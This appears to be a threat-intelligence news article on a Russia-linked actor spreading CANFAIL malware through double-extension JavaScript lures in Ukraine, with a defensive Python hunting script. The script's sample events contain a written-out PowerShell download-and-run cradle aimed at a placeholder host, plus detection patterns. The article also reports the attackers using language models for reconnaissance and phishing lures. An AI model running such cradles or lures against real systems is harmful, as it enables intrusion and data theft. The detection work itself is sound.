Google Threat Intelligence Group has attributed a series of cyber attacks targeting Ukrainian organizations to a previously undocumented threat actor believed to be affiliated with Russian intelligence services. The campaigns involve the deployment of a malware strain known as CANFAIL and have primarily focused on defense, military, government, and energy entities operating at both regional and national levels within Ukraine. The findings highlight continued cyber activity aligned with the broader geopolitical conflict, with attackers adapting their techniques to expand operational reach and effectiveness.
According to Google Threat Intelligence Group, the actor has recently broadened its targeting scope beyond traditional government and defense institutions. Investigations indicate growing interest in aerospace organizations, manufacturing firms with military and drone-related ties, nuclear and chemical research institutions, and international bodies engaged in conflict monitoring and humanitarian assistance efforts within Ukraine. While the group is assessed to be less sophisticated and comparatively under-resourced relative to other known Russian-aligned threat actors, researchers observed that it has started leveraging large language models to overcome some of its technical limitations. Through structured prompting, the group reportedly conducts reconnaissance, develops tailored social engineering lures, and seeks guidance on the technical aspects of post-compromise activity and command-and-control infrastructure setup.
Recent phishing campaigns attributed to the actor demonstrate calculated impersonation tactics. In several instances, the group posed as legitimate national and local Ukrainian energy organizations in an effort to gain unauthorized access to corporate and personal email accounts. The activity also extended beyond Ukraine’s borders, with attackers masquerading as a Romanian energy company serving Ukrainian customers. Researchers further observed targeting of a Romanian firm and reconnaissance operations directed at Moldovan organizations, suggesting a regional intelligence gathering component to the campaign. To facilitate these operations, the threat actor generates customized email address lists aligned with specific industries and geographic regions, enabling more focused spear phishing efforts.
The infection chain frequently involves emails embedding Google Drive links that host a RAR archive containing the CANFAIL malware. The payload is typically disguised with a double file extension such as .pdf.js so that it appears to be a document; on a default Windows install, where known extensions are hidden, the victim sees only the .pdf portion. CANFAIL itself is obfuscated JavaScript that launches a PowerShell script, which in turn downloads and runs a memory-resident PowerShell dropper. At the same time, the malware displays a fabricated error message as a decoy, so that the victim is less likely to suspect that anything ran. Because the dropper stage lives in memory, defenders get little on disk to examine; the more reliable signals are the lure's double-extension filename and the process lineage of a Windows script host (wscript.exe or cscript.exe) spawning powershell.exe with a download cradle. Google also linked the actor to a previously reported campaign known as PhantomCaptcha, disclosed by SentinelOne SentinelLABS in October 2025. That operation targeted organizations associated with Ukraine's war relief initiatives through phishing emails that redirected victims to fraudulent web pages featuring ClickFix-style instructions. The process ultimately delivered a WebSocket-based trojan to compromised systems.
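The chain above gives a defender two concrete things to hunt for: a double-extension lure filename (a document extension followed by a script or executable extension) and a script host spawning PowerShell with an in-memory download cradle. The following Python is an added example written for this page, not Google's or SentinelOne's tooling and not derived from CANFAIL samples. It runs the two checks over process-creation events in the shape of Sysmon Event ID 1 fields; the events, paths, and URL are constructed for the example, and the indicator lists are generic PowerShell cradle patterns rather than anything specific to this actor.

```python
"""Hunt for the CANFAIL-style chain: a double-extension JavaScript lure run by a
Windows script host, which then spawns powershell.exe with a download cradle.
All sample events below are constructed for this example, not real telemetry."""
import re
from dataclasses import dataclass, field

# Extensions a lure borrows to look like a document, and the extensions that
# actually execute when the victim double-clicks the file.
DOC_EXT = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "rtf"}
RUN_EXT = {"js", "jse", "vbs", "vbe", "wsf", "wsh", "hta", "exe", "scr",
           "cmd", "bat", "ps1", "lnk"}

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Generic command-line fragments of an in-memory PowerShell download cradle
# (assumed indicators for the example, not actor-specific signatures).
CRADLE_PATTERNS = [
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b",
     "download cradle"),
    (r"\biex\b|invoke-expression", "in-memory execution"),
    (r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|frombase64string",
     "encoded payload"),
    (r"-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-e(xecutionpolicy|p)\s+bypass",
     "evasion switches"),
]


@dataclass
class ProcessEvent:
    """Subset of Sysmon Event ID 1: parent image, image, command line."""
    parent_image: str
    image: str
    command_line: str
    reasons: list = field(default_factory=list)


def basename(path):
    """Lower-cased final path component, tolerating both slash styles."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_double_extension(filename):
    """True for names like Zvit.pdf.js: a document extension followed by an
    executable one. archive.tar.gz or report.pdf do not qualify."""
    parts = basename(filename).split(".")
    return len(parts) >= 3 and parts[-2] in DOC_EXT and parts[-1] in RUN_EXT


def lure_names(cmdline):
    """Double-extension filenames referenced anywhere in a command line."""
    candidates = re.findall(r"[\w\-\\:./]+\.\w+\.\w+", cmdline)
    return [c for c in candidates if is_double_extension(c)]


def score_event(ev):
    """Attach human-readable reasons to the event; return True if it matches
    either stage of the chain."""
    ev.reasons = []
    parent, child = basename(ev.parent_image), basename(ev.image)
    edge = parent in SCRIPT_HOSTS and child in POWERSHELL
    if edge:
        ev.reasons.append(f"{parent} spawned {child}")
    cradle = False
    for pattern, label in CRADLE_PATTERNS:
        if re.search(pattern, ev.command_line, re.IGNORECASE):
            ev.reasons.append(label)
            cradle = True
    lures = lure_names(ev.command_line)
    for name in lures:
        ev.reasons.append(f"double-extension lure {basename(name)}")
    # Stage 1: a lure filename on the command line is enough by itself.
    # Stage 2: require the script-host -> PowerShell edge together with a
    # cradle indicator, so an admin's lone "powershell -NoProfile" does not fire.
    return bool(lures) or (edge and cradle)


def hunt(events):
    """Return the events that match, each annotated with its reasons."""
    return [ev for ev in events if score_event(ev)]


# Constructed sample telemetry: lure launch, cradle launch, and a benign
# admin script that trips one weak indicator but must not be flagged.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\wscript.exe",
                 r'"C:\Windows\System32\WScript.exe" '
                 r'"C:\Users\olena\Downloads\Zvit_2025\Zvit_energo.pdf.js"'),
    ProcessEvent(r"C:\Windows\System32\wscript.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy "
                 "Bypass -Command \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/s2')\""),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"),
]

if __name__ == "__main__":
    for ev in hunt(SAMPLE_EVENTS):
        print(basename(ev.parent_image), "->", basename(ev.image), "|", "; ".join(ev.reasons))
```

The point of the two-stage rule is that the first stage fires on the file name alone, which is visible at delivery time (mail gateway, archive inspection) and does not depend on the decoy error message or on anything the memory-resident dropper later does; the second stage only needs the parent/child lineage and the command line, both of which are logged even when nothing is written to disk.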
The analysis underscores the evolving tactics of state-aligned cyber actors and the increasing use of artificial intelligence tools to refine reconnaissance and social engineering. As the conflict in Ukraine continues to shape cyber activity across Europe, organizations involved in defense, energy, humanitarian support, and related sectors remain exposed to sustained phishing and malware-driven intrusion attempts.